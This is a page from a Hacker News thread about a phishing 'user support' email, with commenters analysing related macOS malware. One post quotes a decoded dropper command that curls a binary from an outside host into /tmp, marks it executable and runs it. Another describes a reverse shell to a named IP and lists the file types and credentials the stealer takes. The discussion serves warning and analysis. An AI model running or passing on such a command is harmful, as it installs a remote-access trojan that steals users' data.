Live data from Hacker News

The scariest "user support" email I've received

devas.life

141–150 of 267 posts

Re: The scariest "user support" email I've received

#141

I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?

the phishers use any of the free file sharing sites. I've seen dropbox, sharefile , even docusign URLs used as well. i don't think you want users considering the domain as a sign of validity, only that odd domains are definitely a sign of invalidity.

I get 3-4 fake Docusign emails a week.

Re: The scariest "user support" email I've received

#142
post #86

Earlier quoted context omitted.

I think it's great. If the LLM takes it upon itself to download malware, the user is protected.

Wait for next step, when the target is actually the LLM.

Wait for the next step, when the lawyers collectively decide that the crook that designed the payload is innocent, and you, the one who copy-pasted it into the LLM for analysis, are the real villain.

Re: The scariest "user support" email I've received

#143
post #52

To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer. I thought perhaps this was going that way up until around the echo | bash bit. I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.

Not helped by the civilizational-infrastructure absence of a role containing someone smart that you can take a bizarre situation to, and expect to get something more than a brush-off.

Re: The scariest "user support" email I've received

#144
Also this git repo[1] that pretend to be an open source MacOS alarm clock dose the same trick. There is no code in git repo. But if you click the "Get Awaken" red button. It has some base64 encoded string which translate to:

https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch

The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.

[1]: https://github.com/Awaken-Mac/Awaken

Re: The scariest "user support" email I've received

#145
post #52

To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer. I thought perhaps this was going that way up until around the echo | bash bit. I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.

Several 911 calls of people sounding to be ordering a pizza but calling for help, where they attacker can also hear the caller. Example: https://youtu.be/UiWTmUNDFRg

Re: The scariest "user support" email I've received

#146
post #99

the website hosting the malware is.. an indian hose supplier? https://www.amanagencies.com/ Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...

Probably experts in rubber-hose cryptanalysis.

And not experts in securing their site from malicious actors using it as a base.

Re: The scariest "user support" email I've received

#148
I’ve always wondered why spam and scam emails have been so…dumb and obvious… 99.9% of the time.

It does seem like AI may change this and if even the tech savvier ones among us are able to be duped, then I’m getting worried for people like my parents or less tech savvy friends… we may be in for a scammy next few years.

Re: The scariest "user support" email I've received

#149

The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer. It also seems to exfiltrate browser session data + cookies, the MacOS key…

I can’t even exfiltrate my MacOS Notes on purpose . Maybe I’ll download it and give it a spin.

It now supports markdown export in latest macos

Re: The scariest "user support" email I've received

#150

> ChatGPT confirmed Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.

I found that amusing too; especially upon reaching the end where it talks about using AI for spam and phishing.
Post reply on HN